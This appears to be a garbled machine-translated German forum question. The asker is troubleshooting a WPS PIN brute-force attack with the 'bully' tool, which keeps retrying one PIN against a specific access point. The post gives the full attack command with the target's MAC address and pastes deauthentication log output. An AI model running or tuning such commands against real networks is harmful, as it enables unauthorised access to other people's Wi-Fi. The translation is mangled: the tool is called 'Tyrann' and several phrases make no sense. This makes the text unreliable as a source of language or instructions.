Tyrann steckt auf derselben Nadel?


BUlly versucht immer wieder den gleichen Pin, warum das so ist. Sollte ich verschiedene Optionen probieren, schlagen Sie mich vor. DER AP, den ich bruteforcing habe, hat die WPS-Sperre deaktiviert. Befehl verwendet

bully -b C8:3A:35:2C:4E:C9 -c 4 -v 3 mon0 

abmelden setzen

[!] Received disassociation/deauthentication from the AP [+] Rx( Auth ) = 'NoAssoc' Next pin '07093685' [!] Received disassociation/deauthentication from the AP [+] Rx( ID ) = 'NoAssoc' Next pin '07093685' [!] Received disassociation/deauthentication from the AP [+] Tx( Auth ) = 'NoAssoc' Next pin '07093685' [!] Received disassociation/deauthentication from the AP [+] Tx( Auth ) = 'NoAssoc' Next pin '07093685' [!] Received disassociation/deauthentication from the AP [+] Tx( Auth ) = 'NoAssoc' Next pin '07093685' 

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